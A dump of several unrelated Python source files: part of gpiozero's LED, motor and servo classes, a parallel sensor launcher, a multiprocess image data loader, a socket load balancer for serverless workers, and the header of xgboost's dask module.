there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the LED. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
PWMLED.is_lit = PWMLED.is_active
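# Illustrative sketch (hypothetical helper, not part of gpiozero): fading a
# PWMLED with the pulse() API documented on PWMOutputDevice above. Pin 17 is
# an arbitrary example pin.
def _example_pulse_pwmled():
    led = PWMLED(17)
    # Fade in over 1s and out over 1s, three times; block until finished.
    led.pulse(fade_in_time=1, fade_out_time=1, n=3, background=False)
    led.close()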
class RGBLED(SourceMixin, Device):
"""
Extends :class:`Device` and represents a full color LED component (composed
of red, green, and blue LEDs).
Connect the common cathode (longest leg) to a ground pin; connect each of
the other legs (representing the red, green, and blue anodes) to any GPIO
pins. You should use three limiting resistors (one per anode).
The following code will make the LED yellow::
from gpiozero import RGBLED
led = RGBLED(2, 3, 4)
led.color = (1, 1, 0)
The `colorzero`_ library is also supported::
from gpiozero import RGBLED
from colorzero import Color
led = RGBLED(2, 3, 4)
led.color = Color('yellow')
:type red: int or str
:param red:
The GPIO pin that controls the red component of the RGB LED. See
:ref:`pin-numbering` for valid pin numbers. If this is :data:`None` a
:exc:`GPIODeviceError` will be raised.
:type green: int or str
:param green:
The GPIO pin that controls the green component of the RGB LED.
:type blue: int or str
:param blue:
The GPIO pin that controls the blue component of the RGB LED.
:param bool active_high:
Set to :data:`True` (the default) for common cathode RGB LEDs. If you
are using a common anode RGB LED, set this to :data:`False`.
:type initial_value: ~colorzero.Color or tuple
:param initial_value:
The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMLED` instances for
each component of the RGBLED. If :data:`False`, construct regular
:class:`LED` instances, which prevents smooth color graduations.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. _colorzero: https://colorzero.readthedocs.io/
"""
def __init__(
self, red=None, green=None, blue=None, active_high=True,
initial_value=(0, 0, 0), pwm=True, pin_factory=None):
self._leds = ()
self._blink_thread = None
if not all(p is not None for p in [red, green, blue]):
raise GPIOPinMissing('red, green, and blue pins must be provided')
LEDClass = PWMLED if pwm else LED
super(RGBLED, self).__init__(pin_factory=pin_factory)
self._leds = tuple(
LEDClass(pin, active_high, pin_factory=pin_factory)
for pin in (red, green, blue)
)
self.value = initial_value
def close(self):
if getattr(self, '_leds', None):
self._stop_blink()
for led in self._leds:
led.close()
self._leds = ()
super(RGBLED, self).close()
@property
def closed(self):
return len(self._leds) == 0
@property
def value(self):
"""
Represents the color of the LED as an RGB 3-tuple of ``(red, green,
blue)`` where each value is between 0 and 1 if *pwm* was :data:`True`
when the class was constructed (and only 0 or 1 if not).
For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1,
0)``, while orange would be ``(1, 0.5, 0)``.
"""
return tuple(led.value for led in self._leds)
@value.setter
def value(self, value):
for component in value:
if not 0 <= component <= 1:
raise OutputDeviceBadValue(
'each RGB color component must be between 0 and 1')
if isinstance(self._leds[0], LED):
if component not in (0, 1):
raise OutputDeviceBadValue(
'each RGB color component must be 0 or 1 with non-PWM '
'RGBLEDs')
self._stop_blink()
for led, v in zip(self._leds, value):
led.value = v
@property
def is_active(self):
"""
Returns :data:`True` if the LED is currently active (not black) and
:data:`False` otherwise.
"""
return self.value != (0, 0, 0)
is_lit = is_active
@property
def color(self):
"""
Represents the color of the LED as a :class:`~colorzero.Color` object.
"""
return Color(*self.value)
@color.setter
def color(self, value):
self.value = value
@property
def red(self):
"""
Represents the red element of the LED as a :class:`~colorzero.Red`
object.
"""
return self.color.red
@red.setter
def red(self, value):
self._stop_blink()
r, g, b = self.value
self.value = value, g, b
@property
def green(self):
"""
Represents the green element of the LED as a :class:`~colorzero.Green`
object.
"""
return self.color.green
@green.setter
def green(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, value, b
@property
def blue(self):
"""
Represents the blue element of the LED as a :class:`~colorzero.Blue`
object.
"""
return self.color.blue
@blue.setter
def blue(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, g, value
def on(self):
"""
        Turn the LED on. This is equivalent to setting the LED color to white
``(1, 1, 1)``.
"""
self.value = (1, 1, 1)
def off(self):
"""
Turn the LED off. This is equivalent to setting the LED color to black
``(0, 0, 0)``.
"""
self.value = (0, 0, 0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on
(:attr:`value` is ``(1, 1, 1)``). If the device has a specific color,
this method inverts the color.
"""
r, g, b = self.value
self.value = (1 - r, 1 - g, 1 - b)
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
if isinstance(self._leds[0], LED):
if fade_in_time:
raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs')
if fade_out_time:
raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs')
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n
)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(
self, fade_in_time=1, fade_out_time=1,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n, background
)
def _stop_blink(self, led=None):
# If this is called with a single led, we stop all blinking anyway
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, on_color,
off_color, n, fps=25):
# Define a simple lambda to perform linear interpolation between
# off_color and on_color
lerp = lambda t, fade_in: tuple(
(1 - t) * off + t * on
if fade_in else
(1 - t) * on + t * off
for off, on in zip(off_color, on_color)
)
sequence = []
if fade_in_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_in_time, True), 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((on_color, on_time))
if fade_out_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_out_time, False), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((off_color, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for l in self._leds:
l._controller = self
for value, delay in sequence:
for l, v in zip(self._leds, value):
l._write(v)
if self._blink_thread.stopping.wait(delay):
break
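# Illustrative sketch (hypothetical helper, not part of gpiozero): stepping an
# RGBLED through a few colours and then pulsing it red, using the value and
# pulse() APIs above. Pins 2, 3 and 4 match the RGBLED docstring example.
def _example_cycle_rgbled():
    from time import sleep
    led = RGBLED(2, 3, 4)
    for colour in ((1, 0, 0), (0, 1, 0), (0, 0, 1), (1, 1, 0)):
        led.value = colour
        sleep(0.5)
    # Pulse red three times, blocking until the pulses complete.
    led.pulse(on_color=(1, 0, 0), n=3, background=False)
    led.off()
    led.close()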
class Motor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor
connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_).
Attach an `H-bridge`_ motor controller to your Pi; connect a power source
(e.g. a battery pack or the 5V pin) to the controller; connect the outputs
of the controller board to the two terminals of the motor; connect the
inputs of the controller board to two GPIO pins.
.. _H-bridge: https://en.wikipedia.org/wiki/H_bridge
The following code will make the motor turn "forwards"::
from gpiozero import Motor
motor = Motor(17, 18)
motor.forward()
:type forward: int or str
:param forward:
The GPIO pin that the forward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type backward: int or str
:param backward:
The GPIO pin that the backward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str or None
:param enable:
The GPIO pin that enables the motor. Required for *some* motor
controller boards. See :ref:`pin-numbering` for valid pin numbers.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, forward=None, backward=None, enable=None, pwm=True,
pin_factory=None):
if not all(p is not None for p in [forward, backward]):
raise GPIOPinMissing(
'forward and backward pins must be provided'
)
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
devices = OrderedDict((
('forward_device', PinClass(forward)),
('backward_device', PinClass(backward)),
))
if enable is not None:
devices['enable_device'] = DigitalOutputDevice(enable,
initial_value=True)
super(Motor, self).__init__(_order=devices.keys(), **devices)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward), with 0 representing
stopped.
"""
return self.forward_device.value - self.backward_device.value
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
try:
self.forward(value)
except ValueError as e:
raise OutputDeviceBadValue(e)
elif value < 0:
try:
self.backward(-value)
except ValueError as e:
raise OutputDeviceBadValue(e)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('forward speed must be between 0 and 1')
if isinstance(self.forward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.backward_device.off()
self.forward_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('backward speed must be between 0 and 1')
if isinstance(self.backward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.forward_device.off()
self.backward_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.forward_device.off()
self.backward_device.off()
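# Illustrative sketch (hypothetical helper, not part of gpiozero): driving a
# motor at half speed in both directions with forward()/backward()/stop().
# Pins 17 and 18 match the Motor docstring example; pwm defaults to True so
# fractional speeds are allowed.
def _example_drive_motor():
    from time import sleep
    motor = Motor(forward=17, backward=18)
    motor.forward(0.5)
    sleep(2)
    motor.backward(0.5)
    sleep(2)
    motor.stop()
    motor.close()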
class PhaseEnableMotor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor connected
to a Phase/Enable motor driver circuit; the phase of the driver controls
whether the motor turns forwards or backwards, while enable controls the
speed with PWM.
The following code will make the motor turn "forwards"::
from gpiozero import PhaseEnableMotor
motor = PhaseEnableMotor(12, 5)
motor.forward()
:type phase: int or str
:param phase:
The GPIO pin that the phase (direction) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str
:param enable:
The GPIO pin that the enable (speed) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None):
if not all([phase, enable]):
raise GPIOPinMissing('phase and enable pins must be provided')
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
super(PhaseEnableMotor, self).__init__(
phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory),
enable_device=PinClass(enable, pin_factory=pin_factory),
_order=('phase_device', 'enable_device'),
pin_factory=pin_factory
)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward).
"""
return (
-self.enable_device.value
if self.phase_device.is_active else
self.enable_device.value
)
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
self.forward(value)
elif value < 0:
self.backward(-value)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.off()
self.enable_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.on()
self.enable_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.enable_device.off()
class Servo(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a PWM-controlled servo
motor connected to a GPIO pin.
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
The following code will make the servo move between its minimum, maximum,
and mid-point positions with a pause between each::
from gpiozero import Servo
from time import sleep
servo = Servo(17)
while True:
servo.min()
sleep(1)
servo.mid()
sleep(1)
servo.max()
sleep(1)
You can also use the :attr:`value` property to move the servo to a
particular position, on a scale from -1 (min) to 1 (max) where 0 is the
mid-point::
from gpiozero import Servo
servo = Servo(17)
servo.value = 0.5
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If ``0`` (the default), the device's mid-point will be set initially.
Other values between -1 and +1 can be specified as an initial position.
:data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_value=0.0,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
if min_pulse_width >= max_pulse_width:
raise ValueError('min_pulse_width must be less than max_pulse_width')
if max_pulse_width >= frame_width:
raise ValueError('max_pulse_width must be less than frame_width')
self._frame_width = frame_width
self._min_dc = min_pulse_width / frame_width
self._dc_range = (max_pulse_width - min_pulse_width) / frame_width
self._min_value = -1
self._value_range = 2
super(Servo, self).__init__(
pwm_device=PWMOutputDevice(
pin, frequency=int(1 / frame_width), pin_factory=pin_factory
),
pin_factory=pin_factory
)
try:
self.value = initial_value
except:
self.close()
raise
@property
def frame_width(self):
"""
The time between control pulses, measured in seconds.
"""
return self._frame_width
@property
def min_pulse_width(self):
"""
The control pulse width corresponding to the servo's minimum position,
measured in seconds.
"""
return self._min_dc * self.frame_width
@property
def max_pulse_width(self):
"""
The control pulse width corresponding to the servo's maximum position,
measured in seconds.
"""
return (self._dc_range * self.frame_width) + self.min_pulse_width
@property
def pulse_width(self):
"""
Returns the current pulse width controlling the servo.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return self.pwm_device.pin.state * self.frame_width
def min(self):
"""
Set the servo to its minimum position.
"""
self.value = -1
def mid(self):
"""
Set the servo to its mid-point position.
"""
self.value = 0
def max(self):
"""
Set the servo to its maximum position.
"""
self.value = 1
def detach(self):
"""
Temporarily disable control of the servo. This is equivalent to
setting :attr:`value` to :data:`None`.
"""
self.value = None
def _get_value(self):
if self.pwm_device.pin.frequency is None:
return None
else:
return (
((self.pwm_device.pin.state - self._min_dc) / self._dc_range) *
self._value_range + self._min_value)
@property
def value(self):
"""
Represents the position of the servo as a value between -1 (the minimum
position) and +1 (the maximum position). This can also be the special
value :data:`None` indicating that the servo is currently
"uncontrolled", i.e. that no control signal is being sent. Typically
this means the servo's position remains unchanged, but that it can be
moved by hand.
"""
result = self._get_value()
if result is None:
return result
else:
# NOTE: This round() only exists to ensure we don't confuse people
# by returning 2.220446049250313e-16 as the default initial value
# instead of 0. The reason _get_value and _set_value are split
# out is for descendents that require the un-rounded values for
# accuracy
return round(result, 14)
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
self.pwm_device.pin.frequency = int(1 / self.frame_width)
self.pwm_device.pin.state = (
self._min_dc + self._dc_range *
((value - self._min_value) / self._value_range)
)
else:
raise OutputDeviceBadValue(
"Servo value must be between -1 and 1, or None")
@property
def is_active(self):
return self.value is not None
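# Illustrative sketch (hypothetical helper, not part of gpiozero): sweeping a
# servo from its minimum to its maximum via the value property, then releasing
# control with detach(). Pin 17 matches the Servo docstring example and the
# 0.1 step size is arbitrary.
def _example_sweep_servo():
    from time import sleep
    servo = Servo(17)
    for i in range(-10, 11):
        servo.value = i / 10.0  # -1.0 .. 1.0 in steps of 0.1
        sleep(0.05)
    servo.detach()  # stop sending control pulses
    servo.close()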
class AngularServo(Servo):
"""
Extends :class:`Servo` and represents a rotational PWM-controlled servo
motor which can be set to particular angles (assuming valid minimum and
maximum angles are provided to the constructor).
Connect a power source (e.g. a battery pack or the 5V pin) to the power
cable of the servo (this is typically colored red); connect the ground
cable of the servo (typically colored black or brown) to the negative of
your battery pack, or a GND pin; connect the final cable (typically colored
white or orange) to the GPIO pin you wish to use for controlling the servo.
Next, calibrate the angles that the servo can rotate to. In an interactive
Python session, construct a :class:`Servo` instance. The servo should move
to its mid-point by default. Set the servo to its minimum value, and
measure the angle from the mid-point. Set the servo to its maximum value,
and again measure the angle::
>>> from gpiozero import Servo
>>> s = Servo(17)
>>> s.min() # measure the angle
>>> s.max() # measure the angle
You should now be able to construct an :class:`AngularServo` instance
with the correct bounds::
>>> from gpiozero import AngularServo
>>> s = AngularServo(17, min_angle=-42, max_angle=44)
>>> s.angle = 0.0
>>> s.angle
0.0
>>> s.angle = 15
>>> s.angle
15.0
.. note::
You can set *min_angle* greater than *max_angle* if you wish to reverse
the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This
can be useful with servos that rotate in the opposite direction to your
expectations of minimum and maximum.
:type pin: int or str
:param pin:
The GPIO pin that the servo is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_angle:
Sets the servo's initial angle to the specified value. The default is
0. The value specified must be between *min_angle* and *max_angle*
inclusive. :data:`None` means to start the servo un-controlled (see
:attr:`value`).
:param float min_angle:
Sets the minimum angle that the servo can rotate to. This defaults to
-90, but should be set to whatever you measure from your servo during
calibration.
:param float max_angle:
Sets the maximum angle that the servo can rotate to. This defaults to
90, but should be set to whatever you measure from your servo during
calibration.
:param float min_pulse_width:
The pulse width corresponding to the servo's minimum position. This
defaults to 1ms.
:param float max_pulse_width:
The pulse width corresponding to the servo's maximum position. This
defaults to 2ms.
:param float frame_width:
The length of time between servo control pulses measured in seconds.
This defaults to 20ms which is a common value for servos.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, initial_angle=0.0,
min_angle=-90, max_angle=90,
min_pulse_width=1/1000, max_pulse_width=2/1000,
frame_width=20/1000, pin_factory=None):
self._min_angle = min_angle
self._angular_range = max_angle - min_angle
if initial_angle is None:
initial_value = None
elif ((min_angle <= initial_angle <= max_angle) or
(max_angle <= initial_angle <= min_angle)):
initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(min_angle, max_angle))
super(AngularServo, self).__init__(
pin, initial_value, min_pulse_width, max_pulse_width, frame_width,
pin_factory=pin_factory
)
@property
def min_angle(self):
"""
The minimum angle that the servo will rotate to when :meth:`min` is
called.
"""
return self._min_angle
@property
def max_angle(self):
"""
The maximum angle that the servo will rotate to when :meth:`max` is
called.
"""
return self._min_angle + self._angular_range
@property
def angle(self):
"""
The position of the servo as an angle measured in degrees. This will
only be accurate if :attr:`min_angle` and :attr:`max_angle` have been
set appropriately in the constructor.
This can also be the special value :data:`None` indicating that the
servo is currently "uncontrolled", i.e. that no control signal is being
sent. Typically this means the servo's position remains unchanged, but
that it can be moved by hand.
"""
result = self._get_value()
if result is None:
return None
else:
# NOTE: Why round(n, 12) here instead of 14? Angle ranges can be
# much larger than -1..1 so we need a little more rounding to
# smooth off the rough corners!
return round(
self._angular_range *
((result - self._min_value) / self._value_range) +
self._min_angle, 12)
@angle.setter
def angle(self, angle):
if angle is None:
self.value = None
elif ((self.min_angle <= angle <= self.max_angle) or
(self.max_angle <= angle <= self.min_angle)):
self.value = (
self._value_range *
((angle - self._min_angle) / self._angular_range) +
self._min_value)
else:
raise OutputDeviceBadValue(
"AngularServo angle must be between %s and %s, or None" %
(self.min_angle, self.max_angle))
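# A minimal usage sketch (never called here) illustrating the linear
# angle-to-value mapping implemented by the angle setter above, assuming the
# -1..1 value range enforced by Servo and the default 1ms/2ms pulse widths.
# Pin 17 is only an example pin number.
def _angular_servo_mapping_sketch():
    s = AngularServo(17, min_angle=0, max_angle=180)
    s.angle = 90    # value = 2 * (90 / 180) - 1 = 0, i.e. the 1.5ms mid-point pulse
    s.angle = 180   # value = 2 * (180 / 180) - 1 = 1, i.e. the 2ms maximum pulse
    s.angle = None  # stop sending a control signal; the servo is "uncontrolled"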
|
sensor.py
|
from multiprocessing import Process
# Run all sensor scripts at the same time. Each module does its work at import
# time, so importing it inside its own process runs the scripts in parallel.
def one(): import bme280
def two(): import ccs811
def three(): import top_phat_button
def four(): import weather_bom
# Guard the process start-up so the module can be imported safely (required on
# platforms that use the "spawn" start method).
if __name__ == '__main__':
    Process(target=one).start()
    Process(target=two).start()
    Process(target=three).start()
    Process(target=four).start()
|
mt_loader.py
|
import logging
import numpy as np
import time
import random
from multiprocessing import Process, Queue, Value
import sys
def transform_mirror(x):
if random.random() < 0.5:
x = np.fliplr(x)
return x
def crop_image(img1, imsize):
    h, w, c = img1.shape
    # use integer division so the slice indices are ints
    x1 = (w - imsize[0]) // 2
    y1 = (h - imsize[1]) // 2
    img1_ = img1[y1:(y1 + imsize[1]), x1:(x1 + imsize[0]), :]
    return img1_
def transform_crop_96x112(x):
return crop_image(x, (96, 112))
transforms = [ transform_crop_96x112 ]
def addTransform(func):
    global transforms
    if func not in transforms:
        transforms.append(func)
def threadProc(todo, done, quit_signal):
    global transforms
    # keep pulling tasks until the shared quit flag is set
    while quit_signal.value != 1:
        try:
            task = todo.get()
            func = task[0]
            param = task[1]
            x, y = func(param)
            # apply the registered transforms
            for t in transforms:
                x = t(x)
            if quit_signal.value == 1:
                break
            done.put((x, y))
            #print("done id:%d" % y)
        except Exception as e:
            #time.sleep(0.5)
            #print(task)
            print(e)
    sys.exit(0)
class MultiThreadLoader:
def __init__(self, dataset, batch_size, nworkers = 1):
self.B = dataset
self.batch_size = batch_size
# todo list
self.maxsize = batch_size * 2
self.todo = Queue(self.maxsize)
# done list
self.done = Queue(self.maxsize)
        # pre-fill the todo queue before starting the workers
        self.feed()
        # shared flag used to tell the workers to stop
        self.quit_signal = Value('i', 0)
        # create worker processes
        self.createThread(nworkers)
def numOfClass(self):
return self.B.numOfClass()
def size(self):
return self.B.size()
def shuffle(self):
# shuffle
self.B.digest()
# prefeed
self.feed()
def createThread(self, nworkers):
self.threads = []
#self.db_lock = threading.Lock()
for i in range(nworkers):
t = Process(target=threadProc, args=(self.todo, self.done, self.quit_signal), name='worker/'+str(i))
t.start()
self.threads.append(t)
def feed(self):
if self.todo.full():
return
n = self.maxsize - self.todo.qsize()
for i in range(n):
task = self.B.nextTask()
self.todo.put(task)
#print("todo id:%d" % y)
def fetch(self):
x_list = []
y_list = []
for i in range(self.batch_size):
x, y = self.done.get()
#print("fetch id:%d" % y)
x_list.append(x)
y_list.append(y)
x_batch = np.stack(x_list, axis=0)
y_batch = np.array(y_list)
#x_batch = np.transpose(x_batch,[0,2,1,3])
return x_batch, y_batch
def getBatch(self):
start = time.time()
ret = self.fetch()
end = time.time()
self.feed()
t2 = time.time()
#print('fetch:%f feed:%f' % (end - start, t2 - end) )
return ret
def close(self):
        # set the shared flag so workers leave their loop, then terminate them
        self.quit_signal.value = 1
        print("mtloader close")
        for t in self.threads:
            try:
                t.terminate()
            except Exception:
                pass
for t in self.threads:
print(t.is_alive())
self.threads = []
# close datasets
self.B.close()
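# A minimal usage sketch (never called). The `dataset` argument is assumed to
# provide the methods used above: nextTask(), digest(), numOfClass(), size()
# and close(); it is not part of this module.
def _example_usage(dataset, n_batches=10):
    loader = MultiThreadLoader(dataset, batch_size=32, nworkers=4)
    for _ in range(n_batches):
        x_batch, y_batch = loader.getBatch()  # blocks until a full batch is ready
        print(x_batch.shape, y_batch.shape)
    loader.close()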
|
load_balancer.py
|
import logging
import random
import socket
import socketserver
import threading
from serverless.worker import Worker
logger = logging.getLogger(__name__)
class _LoadBalancerHandler(socketserver.StreamRequestHandler):
def __init__(self, workers: list[Worker], *args, **kwargs):
self.workers = workers
super().__init__(*args, **kwargs)
def handle(self) -> None:
source = self.rfile.readline().strip()
worker = random.choice(self.workers)
logger.info(
f"Forwarding source code to worker {(worker.host, worker.port)}: {source}"
)
with socket.socket() as s:
s.connect((worker.host, worker.port))
s.sendall(source + b"\n")
# make sure we get a response
s.recv(4096)
self.wfile.write(b"\n")
class LoadBalancer:
def __init__(self, host: str, port: int, workers: list[Worker], request_queue_size: int = 5):
self.host = host
self.port = port
self.workers = workers
self.server = socketserver.ThreadingTCPServer(
(host, port),
lambda *args, **kwargs: _LoadBalancerHandler(workers, *args, **kwargs),
)
self.server.request_queue_size = request_queue_size
def run(self):
logger.info(f"Starting load balancer on {(self.host, self.port)}")
for worker in self.workers:
threading.Thread(target=worker.run).start()
self.server.serve_forever()
def shutdown(self):
for worker in self.workers:
worker.shutdown()
self.server.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
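# A minimal usage sketch (never called). The Worker constructor arguments are
# assumed to be (host, port); adjust them to the actual serverless.worker.Worker
# API. Ports 9000-9002 are only example values.
def _example_usage():
    workers = [Worker("127.0.0.1", 9001), Worker("127.0.0.1", 9002)]
    with LoadBalancer("127.0.0.1", 9000, workers) as balancer:
        threading.Thread(target=balancer.run, daemon=True).start()
        # a client sends one line of source code and waits for the reply
        with socket.socket() as s:
            s.connect(("127.0.0.1", 9000))
            s.sendall(b"print('hello')\n")
            s.recv(4096)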
|
dask.py
|
# pylint: disable=too-many-arguments, too-many-locals, no-name-in-module
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines
# pylint: disable=import-error
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for a simple
tutorial. See also xgboost/demo/dask for some examples.
There are two sets of APIs in this module: one is the functional API, including
the ``train`` and ``predict`` methods; the other is the stateful Scikit-Learn
wrapper inherited from the single-node Scikit-Learn interface.
